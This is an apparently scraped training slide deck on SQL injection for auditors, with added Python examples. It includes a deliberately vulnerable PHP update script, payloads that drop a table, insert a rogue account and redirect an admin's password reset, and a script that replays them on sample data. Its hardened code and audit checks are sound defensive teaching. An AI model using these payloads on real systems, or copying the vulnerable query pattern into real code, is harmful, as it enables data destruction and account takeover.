Injection Attacks
Executing, Preventing, and Auditing
What is an Injection Attack?
  • Exploits weak application-level controls around the "system" ID,
    the database account the web application itself logs in with

  • The client, a.k.a. the attacker, "piggybacks" code into a request
    to a web page and has the "system" ID execute it on their behalf

  • Can both execute commands and insert / update / delete data




Conversys Technologies PVT. Ltd.
What is the Danger?
  • Typically the "system" ID has "all access" rights to the
    database

  • When exploited, the attacker can do anything the "system"
    ID can

  • Requires no special equipment or advanced knowledge




Industry
  Joint study by the US Department of Commerce and Visa
  Ranked as one of the top 5 greatest data security vulnerabilities

  "SQL injection is a technique used to exploit Web-based
  applications by using client-supplied data in SQL queries. SQL
  injection attacks are caused primarily by applications that lack input
  validation checks. Recently, commercial shopping cart products
  have been the focus of attack by hackers who seek account
  information. PCI DSS Requirement 6.5 requires that Web-facing
  applications be developed in accordance with secure coding
  guidelines to guard against such attacks."




Different Types of Code Injection

• SQL Injection (most prevalent)

• LDAP Injection

• XML Injection

• Others......

    * The flaw is not specific to the query language; it lies in the web
      application that embeds the query and pastes untrusted input into it




Structure of Web Based Systems


  • Application logic – Typically built with a scripting language
    (PHP, JSP, ASP), a lightweight layer that interfaces with the
    data source and controls the behavior of the program

  • Data Source – Typically a database, but could also be a
    flat file, XML file, or another application

  • The interface between the application and the data source is
    typically an embedded language: one kind of code is assembled
    inside another (such as a PHP script building and executing
    SQL commands). Injection happens at exactly this boundary,
    where data supplied by the client becomes part of the code.


How does it work?

  Review of Client-Server Architecture
  You (the client) request a web page
  The server responds with the page, which is displayed on the client computer
  The client enters data
  The server takes the data, runs the server-side script, queries the database, and returns the results




What really happens when you search?



  The server has a prewritten SQL query stored in a script:
  select item, picture from ItemDB where description = '$client_input';

  You input "american psycho 1st"




  The prewritten query is then executed by the "system" ID as:
  select item, picture from ItemDB where description = 'american psycho 1st';



  Please Note: You just used the "system" ID to execute a query whose text YOU helped write. In practice, most
  "system" IDs have DBA-level access, and are restricted only by the logic built into the application itself.




Code Example (payroll field update, deliberately vulnerable)
<?php
session_start();
header("Cache-control: private"); // IE 6 fix
error_reporting(E_ALL);           // full error detail; with display_errors on, it reaches the client
?>
<html>
<body bgcolor="white">
<?php
$email = $_SESSION['email'];               // user's email address, taken from the session
$value = stripslashes($_POST['newdata']);  // data entered by the user; stripslashes() removes any backslash escaping
$fieldname = $_POST['type'];               // field name to update, taken straight from the request
if ($_SESSION['access_rights'] == 1)
{
    $db = mysql_connect("localhost", "system_id", "password"); // connects to the local DB as the "system" ID
    mysql_select_db("payroll", $db);                           // selects the database to query
    // Prewritten query: $fieldname and $value are pasted into the SQL text unescaped
    $query = "UPDATE data SET $fieldname='$value' WHERE email = '$email'";
    $result = mysql_query($query, $db);                        // executes the query (mysql_* extension: removed in PHP 7)
    echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>";
}
?>




How can we exploit this?
SQL Query Stored in Application:

         select item, picture from ItemDB where description = '$client_input'

To commit a SQL Injection Attack, enter into the web site form:

                                   x'; drop table ItemDB; -- 

         The query executed by the "System" ID will now be:

         select item, picture from ItemDB where description = 'x'; drop table ItemDB; -- '

The first quote closes the string literal, the semicolon ends the SELECT, and the
comment marker swallows the closing quote the script appends. The server just executed
the stored query, and we effectively destroyed the entire "ItemDB" table!

Caveat: this particular payload relies on the database API running more than one
statement per call. PHP's mysql_query(), used in the code example, refuses stacked
statements (mysqli_multi_query() does not); where stacking is blocked, the injection is
still present and an attacker works inside the single statement instead, for example
with an always-true WHERE clause or a UNION.



Even More Fun…
  "Add A New User"

  Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = '$user_input';
  SQL Attack: x'; INSERT INTO members (email, passwd, login_id, full_name)
  VALUES ('mike@pinch.com', 'mynewPW', 'pinch', 'Mike Pinch'); -- 
  System then Executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = 'x'; INSERT INTO members (email, passwd, login_id, full_name)
  VALUES ('mike@pinch.com', 'mynewPW', 'pinch', 'Mike Pinch'); -- ';

  I now have my very own account!




One More for Good Measure
  "Forgot my Password"
  Canned Query: SELECT email, passwd, login_id, full_name FROM members WHERE
  email = '$UserInput';
  SQL Attack: x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email =
  'sysadmin@CLIENTX.com'; -- 
  System then Executes: SELECT email, passwd, login_id, full_name FROM members
  WHERE email = 'x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE
  email = 'sysadmin@CLIENTX.com'; -- ';
  Now just go to "forgot my password", type pinch@CLIENTX.com, and the system will
                  conveniently email me the system admin's password!
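The three attacks above, replayed end to end as an added example (this is the editor's code, not part of the original deck). Python's sqlite3 module stands in for the PHP/MySQL stack on the slides, and the ItemDB and members tables and their rows are constructed for the demonstration. The stacked statements are run through executescript(), which models a database API that executes every statement in the string; the last step shows what a one-statement-per-call API such as sqlite3's execute() (or PHP's mysql_query()) does with the same payload.

```python
import sqlite3

# Constructed sample schema standing in for the slides' ItemDB and members tables.
SCHEMA = """
CREATE TABLE ItemDB (item TEXT, picture TEXT, description TEXT);
INSERT INTO ItemDB VALUES ('B001', 'ap1.jpg', 'american psycho 1st');
INSERT INTO ItemDB VALUES ('B002', 'ap2.jpg', 'american psycho 2nd');
CREATE TABLE members (email TEXT, passwd TEXT, login_id TEXT, full_name TEXT);
INSERT INTO members VALUES ('sysadmin@CLIENTX.com', 's3cret', 'sysadmin', 'Site Admin');
"""

# The slides' canned queries; {input} marks where the script pastes client data.
SEARCH = "SELECT item, picture FROM ItemDB WHERE description = '{input}';"
MEMBER_LOOKUP = ("SELECT email, passwd, login_id, full_name FROM members "
                 "WHERE email = '{input}';")


def fresh_db():
    """New in-memory database loaded with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def run_canned_vulnerable(db, canned, user_input):
    """The vulnerable pattern from the slides: client input is substituted into
    the SQL text. executescript() is used deliberately to model a database API
    that runs every statement in the string (stacked queries), which is what the
    DROP / INSERT / UPDATE payloads rely on. Returns the SQL actually executed."""
    sql = canned.replace("{input}", user_input)
    db.executescript(sql)
    return sql


def table_exists(db, name):
    row = db.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def demo():
    """Replays the three attacks from the slides and records their effects."""
    out = {}

    # Slide 8: an ordinary search, a single statement, behaves as intended.
    db = fresh_db()
    legit_sql = SEARCH.replace("{input}", "american psycho 1st")
    out["legit_search"] = db.execute(legit_sql).fetchall()

    # Slide 10: close the string, end the SELECT, add a DROP, and comment out
    # the quote and semicolon the script appends after the input.
    out["drop_sql"] = run_canned_vulnerable(db, SEARCH, "x'; DROP TABLE ItemDB; -- ")
    out["itemdb_dropped"] = not table_exists(db, "ItemDB")

    # Slide 11: the same trick on the member lookup inserts an account.
    run_canned_vulnerable(
        db, MEMBER_LOOKUP,
        "x'; INSERT INTO members (email, passwd, login_id, full_name) "
        "VALUES ('mike@pinch.com', 'mynewPW', 'pinch', 'Mike Pinch'); -- ",
    )
    out["account_added"] = db.execute(
        "SELECT login_id FROM members WHERE email = 'mike@pinch.com'"
    ).fetchone() == ("pinch",)

    # Slide 12: re-point the administrator's address so a password reset
    # goes to the attacker.
    run_canned_vulnerable(
        db, MEMBER_LOOKUP,
        "x'; UPDATE members SET email = 'pinch@CLIENTX.com' "
        "WHERE email = 'sysadmin@CLIENTX.com'; -- ",
    )
    out["admin_email_hijacked"] = db.execute(
        "SELECT login_id FROM members WHERE email = 'pinch@CLIENTX.com'"
    ).fetchone() == ("sysadmin",)

    # Caveat: an API that runs one statement per call refuses the stacked
    # payload outright. sqlite3's execute() is such an API (PHP's mysql_query()
    # behaves the same way); it raises ProgrammingError on current Python and
    # sqlite3.Warning on older releases. The injection itself is still there;
    # only this payload shape is blocked.
    try:
        db.execute(MEMBER_LOOKUP.replace("{input}", "x'; DROP TABLE members; -- "))
        out["single_statement_api_refused"] = False
    except (sqlite3.Warning, sqlite3.Error):
        out["single_statement_api_refused"] = True
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Each payload has the same three parts: a quote that closes the literal the script opened, the attacker's own statement, and a comment marker that neutralises whatever the script appends after the input.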




Prevention




Error Message Masking

  (Slide shows two screenshots, labelled "Bad" and "Good".)




Error Masking
  • Blocks real error messages from being displayed to the
    client

  • Best Practice
    All specific error messages are suppressed, either by
    returning a generic error message or by blocking them
    altogether. The full detail still goes to a server-side log,
    where it is needed for troubleshooting and for spotting
    injection attempts.




How are Attacks Prevented?
         Use parameterized queries (prepared statements), so that user data is
         bound to the query and never becomes part of its text
         Validate all input, including:
  •      Data collected in forms through browsers
  •      Data collected in URLs
  •      Data collected through cookies
  •      White/Black lists (prefer a white list of what is allowed; a black list of
         "bad" characters is easy to bypass and rejects legitimate input)
  •      Mask error messages
  •      Run the application's database ID with the least privilege it needs,
         not DBA rights
  •      Continuous monitoring
  •      New technique: SQL firewalls
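The hardened counterpart of the payroll update in the code example, as an added example in Python/sqlite3 (editor's code, not the deck's; the data table, the allow-list UPDATABLE_FIELDS and the sample rows are constructed). It applies three of the controls listed above: bound parameters for the values, an allow-list for the column name (a column name cannot be a bound parameter, so a white list is the only option there), and error masking with the detail sent to the server log rather than the client.

```python
import logging
import sqlite3

# Constructed allow-list of columns the form's "type" parameter may name.
# Identifiers cannot be bound as query parameters, so the column name is
# checked against this set and only its members ever reach the SQL text.
UPDATABLE_FIELDS = {"phone", "address"}

# Constructed sample schema standing in for the slide's payroll "data" table.
SCHEMA = """
CREATE TABLE data (email TEXT PRIMARY KEY, phone TEXT, address TEXT);
INSERT INTO data VALUES ('alice@example.com', '555-0100', '1 Main St');
INSERT INTO data VALUES ('sysadmin@CLIENTX.com', '555-0199', '9 Admin Rd');
"""

log = logging.getLogger("payroll")


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def update_field(db, fieldname, value, email):
    """Hardened form of the slide's UPDATE: the column comes from an allow-list
    and both values are bound parameters, so they are data, never SQL text.
    Returns the number of rows changed."""
    if fieldname not in UPDATABLE_FIELDS:
        raise ValueError(f"field not updatable: {fieldname!r}")
    sql = f"UPDATE data SET {fieldname} = ? WHERE email = ?"
    cur = db.execute(sql, (value, email))
    db.commit()
    return cur.rowcount


def handle_update(db, post, session):
    """Request handler with error masking: the client sees a generic message,
    the detail goes to the server-side log. Returns the client-facing message."""
    if session.get("access_rights") != 1:
        return "forbidden"
    try:
        changed = update_field(db, post.get("type", ""), post.get("newdata", ""),
                               session["email"])
        return "updated" if changed else "no change"
    except ValueError as exc:
        log.warning("rejected update from %s: %s", session["email"], exc)
        return "invalid request"
    except sqlite3.Error as exc:
        log.error("database error for %s: %s", session["email"], exc)
        return "an error occurred"


def read(db, email):
    return db.execute(
        "SELECT phone, address FROM data WHERE email = ?", (email,)
    ).fetchone()


def demo():
    db = fresh_db()
    session = {"email": "alice@example.com", "access_rights": 1}
    out = {}
    # An ordinary update.
    out["normal"] = handle_update(db, {"type": "phone", "newdata": "555-0111"}, session)
    # The slide's DROP payload is stored as a plain string; the table survives.
    out["payload_stored"] = handle_update(
        db, {"type": "address", "newdata": "x'; DROP TABLE data; -- "}, session)
    # An apostrophe in legitimate data is just data too (a character black list
    # would have rejected it).
    out["apostrophe"] = handle_update(
        db, {"type": "address", "newdata": "O'Brien House"}, session)
    # A column name crafted to rewrite the WHERE clause is refused before any
    # SQL is built.
    out["bad_field"] = handle_update(
        db, {"type": "phone = '0' WHERE 1=1; --", "newdata": "0"}, session)
    out["alice"] = read(db, "alice@example.com")
    out["admin"] = read(db, "sysadmin@CLIENTX.com")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The allow-list is the part most often forgotten: parameter binding protects the values, but the slide's `$fieldname` is an identifier, and the only defence for an identifier is to compare it against the fixed set of names the application is prepared to update.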




Prevalence of Attacks
  • Injection attacks are extremely powerful, almost always
    malicious, and nearly undetectable (until it's too late)
  • The danger comes from simplicity: no special hardware or
    software is necessary, just syntax knowledge and a
    browser!
  • In 2006, 14% of newly released commercial applications
    and open source tools were vulnerable to SQL injection
    attacks.
  • A recent study found 10.3% of the web sites surveyed were
    not masking error messages




Integrating into the Audit
      •      Weak controls related to preventing injection attacks may affect the
             nature, timing and extent of financial statement substantive audit
             procedures.

      •      Assistance may be needed from systems or data management
             professionals to help identify if there were instances in which the
             control weaknesses were exploited.

      •      Cobit Framework (See excerpt)
              – DS 5.3, Identity Management

      •      "All users (internal, external and temporary) and their activity on IT
             systems (business application, system operation, development and
             maintenance) should be uniquely identifiable. User access rights to
             systems and data should be in line with defined and documented
             business needs and job requirements. User access rights are requested
             by user management, approved by system owner and implemented by the
             security-responsible person. User identities and access rights are
             maintained in a central repository. Cost-effective technical and
             procedural measures are deployed and kept current to establish user
             identification, implement authentication and enforce access rights."




What Systems are Vulnerable?
  • Predominantly internally developed applications
  • Web based client-server architecture
  • Any system where access is available via the web




How do you determine if a system is vulnerable?
     •      Inquire
             – Do you have database and server error messages masked?
             – Do you have a strategy to validate all user input and detect SQL injection
                attempts?
             – Walk me through how your system prevents SQL injection attempts, i.e.
                parameterized queries, input filtering, limiting the database ID's rights.

     •      Observe
             – Ask the client to generate an error message
                  • Should be either generic or non-existent
     •      Inspect
             – Request a code sample showing how queries are built and how input is filtered
                  • User input should be bound as query parameters, not concatenated into the SQL
                  • A filter that only strips suspicious characters such as ' , / ; & % $ is weak
                    evidence on its own: it is easily bypassed and rejects legitimate input
                    (a surname like O'Brien)
                  • View the white/black list

     •      Attack and Penetration Testing
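For the Observe and Attack-and-Penetration-Testing steps, an added example (editor's code, not from the deck) of the two quickest checks a tester runs against a search parameter: does a lone quote produce a database error, and does an always-true clause widen the result set while an always-false one narrows it. Python/sqlite3 stands in for the PHP/MySQL stack and the ItemDB rows are constructed. Both the concatenated search from the slides and a parameterized version are probed so the two outcomes can be compared.

```python
import sqlite3

BASELINE = "american psycho 1st"   # a term known to match exactly one row

# Constructed rows standing in for the slides' ItemDB table.
SCHEMA = """
CREATE TABLE ItemDB (item TEXT, picture TEXT, description TEXT);
INSERT INTO ItemDB VALUES ('B001', 'ap1.jpg', 'american psycho 1st');
INSERT INTO ItemDB VALUES ('B002', 'ap2.jpg', 'american psycho 2nd');
INSERT INTO ItemDB VALUES ('B003', 'fc1.jpg', 'fight club 1st');
"""


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def search_concatenated(db, term):
    """Search built the way the slides show it (input pasted into the SQL);
    database errors propagate, as they do when error messages are not masked."""
    return db.execute(
        f"SELECT item, picture FROM ItemDB WHERE description = '{term}'"
    ).fetchall()


def search_parameterized(db, term):
    """The same search with the term bound as a parameter."""
    return db.execute(
        "SELECT item, picture FROM ItemDB WHERE description = ?", (term,)
    ).fetchall()


def probe(search):
    """Runs the two cheapest injection checks against a search function.

    search(term) must return a list of rows and raise sqlite3.Error when the
    database rejects the query (i.e. the application leaks the failure).
    Returns the individual signals plus an overall verdict."""
    signals = {}
    baseline = len(search(BASELINE))

    # Error-based check: a lone quote breaks an unescaped string literal.
    try:
        search("'")
        signals["error_on_quote"] = False
    except sqlite3.Error as exc:
        signals["error_on_quote"] = True
        signals["error_text"] = str(exc)

    # Boolean check: an always-true clause should widen the result set and an
    # always-false one should narrow it, but only if the input reaches the SQL.
    try:
        widened = len(search(BASELINE + "' OR '1'='1")) > baseline
        narrowed = len(search(BASELINE + "' AND '1'='2")) < baseline
    except sqlite3.Error:
        widened = narrowed = False
    signals["boolean_differential"] = widened and narrowed

    signals["injectable"] = signals["error_on_quote"] or signals["boolean_differential"]
    return signals


def demo():
    db = fresh_db()
    return {
        "concatenated": probe(lambda t: search_concatenated(db, t)),
        "parameterized": probe(lambda t: search_parameterized(db, t)),
    }


if __name__ == "__main__":
    for name, signals in demo().items():
        print(f"{name}: {signals}")
```

The boolean check is the one to rely on when errors are masked: masking hides the quote-induced failure from the tester, but it does nothing to stop the always-true clause from changing what the query returns, which is why masking is a mitigation for information leakage, not a fix for the injection.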




Created and Presented by Krishnendu Paul
  Vice President – Technologies
  Conversys Technologies Pvt. Ltd.
  A Maxelor Company



  References
  http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley
  http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities_Bulletin_August2006.pdf - 2006 Visa USA
  "Applying an improved economic model to software buy-versus-build decisions", Higaki, Wesley. Hewlett-Packard Journal, August 1995.
  "Cobit 4.0", IT Governance Institute, 2005
  Mitre Corporation, 2006




Thanks

         Conversys Technologies Pvt. Ltd.

  •      Kolkata Office : 7, Bondel Road, Kolkata, West Bengal India – 700019
                           E-mail:     info@conversys.in
                                    Telephone: +91-33-64602675


  •      Pune Office:              #204, Casa Grande, Lane No. 8. Koregaon Park, Pune - 411 001
                                   Telephone: +91 20 26052014


  •      US Office:                15 Corporate Place, Suite# 333 Piscataway, NJ, 08854 USA





Mais conteúdo relacionado

Mais procurados

20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
Nicola_Milone
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
Saravanan Purushothaman
 
Role based access control
Role based access controlRole based access control
Role based access control
Peter Edwards
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
Deny Prasetia
 
Security hole #5 application security science or quality assurance
Security hole #5 application security   science or quality assuranceSecurity hole #5 application security   science or quality assurance
Security hole #5 application security science or quality assurance
Tjylen Veselyj
 

Mais procurados (20)

Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modeling
 
20111012 Sap Datasheet Site
20111012 Sap Datasheet Site20111012 Sap Datasheet Site
20111012 Sap Datasheet Site
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
 
IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant IT_Security_Service Delivery_Consultant
IT_Security_Service Delivery_Consultant
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Enhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tipsEnhancing your mobile enterprise security with ibm worklight tips
Enhancing your mobile enterprise security with ibm worklight tips
 
Discussion Paper: Bugs Tracking
Discussion Paper: Bugs TrackingDiscussion Paper: Bugs Tracking
Discussion Paper: Bugs Tracking
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Role based access control
Role based access controlRole based access control
Role based access control
 
Access Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource AuthorizationAccess Control Models: Controlling Resource Authorization
Access Control Models: Controlling Resource Authorization
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Common Sense Security Framework
Common Sense Security FrameworkCommon Sense Security Framework
Common Sense Security Framework
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access control
 
Robert donald resume iam 1
Robert donald resume iam 1Robert donald resume iam 1
Robert donald resume iam 1
 
Advanced applications-architecture-threats
Advanced applications-architecture-threatsAdvanced applications-architecture-threats
Advanced applications-architecture-threats
 
Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)Implementing role based access control on Web Application (sample case)
Implementing role based access control on Web Application (sample case)
 
Security hole #5 application security science or quality assurance
Security hole #5 application security   science or quality assuranceSecurity hole #5 application security   science or quality assurance
Security hole #5 application security science or quality assurance
 
Cloud Security vs Security in the Cloud
Cloud Security vs Security in the CloudCloud Security vs Security in the Cloud
Cloud Security vs Security in the Cloud
 
Vulnerability manager v1.0
Vulnerability manager v1.0Vulnerability manager v1.0
Vulnerability manager v1.0
 

Destaque

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
Jirka Vejrazka
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentation
Nicholas Davis
 
Npc case studies
Npc case studiesNpc case studies
Npc case studies
Ron Young
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126
Amr Abou Zaid
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?
Sheeba Thukral
 

Destaque (20)

Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
 
Web Security
Web SecurityWeb Security
Web Security
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injection
 
Sql vulnerability advisory presentation
Sql vulnerability advisory presentationSql vulnerability advisory presentation
Sql vulnerability advisory presentation
 
An Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection AttackAn Anatomy of a SQL Injection Attack
An Anatomy of a SQL Injection Attack
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Npc case studies
Npc case studiesNpc case studies
Npc case studies
 
Scrum By muhammad shariq
Scrum By muhammad shariqScrum By muhammad shariq
Scrum By muhammad shariq
 
Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"Направления совершенствования 97-ФЗ "Закон о блогерах"
Направления совершенствования 97-ФЗ "Закон о блогерах"
 
Internal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 octInternal Quality Audit Training Islamabad 21 22 oct
Internal Quality Audit Training Islamabad 21 22 oct
 
Mgmt 557-2
Mgmt 557-2Mgmt 557-2
Mgmt 557-2
 
белянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанныебелянин психостилистика-02-типы-06-смешанные
белянин психостилистика-02-типы-06-смешанные
 
What's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 updateWhat's new in digital marketing technology and media - midyear 2014 update
What's new in digital marketing technology and media - midyear 2014 update
 
IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126IBM_EGIC_CorpSlide_150126
IBM_EGIC_CorpSlide_150126
 
What can Toastmasters do for you?
What can Toastmasters do for you?What can Toastmasters do for you?
What can Toastmasters do for you?
 
Testforslide
TestforslideTestforslide
Testforslide
 
REALTOR Client Retargeting
REALTOR Client RetargetingREALTOR Client Retargeting
REALTOR Client Retargeting
 
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapterSami: Intro, Vision and Action Plan for PMI Islamabad chapter
Sami: Intro, Vision and Action Plan for PMI Islamabad chapter
 
Gayab
GayabGayab
Gayab
 

Semelhante a Injection techniques conversys

owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
Arun Voleti
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
Michael Hidalgo
 

Semelhante a Injection techniques conversys (20)

Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Cyber Security # Lec 5
Cyber Security # Lec 5Cyber Security # Lec 5
Cyber Security # Lec 5
 
Security testing
Security testingSecurity testing
Security testing
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Pillars of great Azure Architecture
Pillars of great Azure ArchitecturePillars of great Azure Architecture
Pillars of great Azure Architecture
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
Develop, Test & Maintain Secure Systems (While Being PCI Compliant)
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web Developers
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Ethical hacking
Ethical hacking Ethical hacking
Ethical hacking
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...
 

Último

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 

Último (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
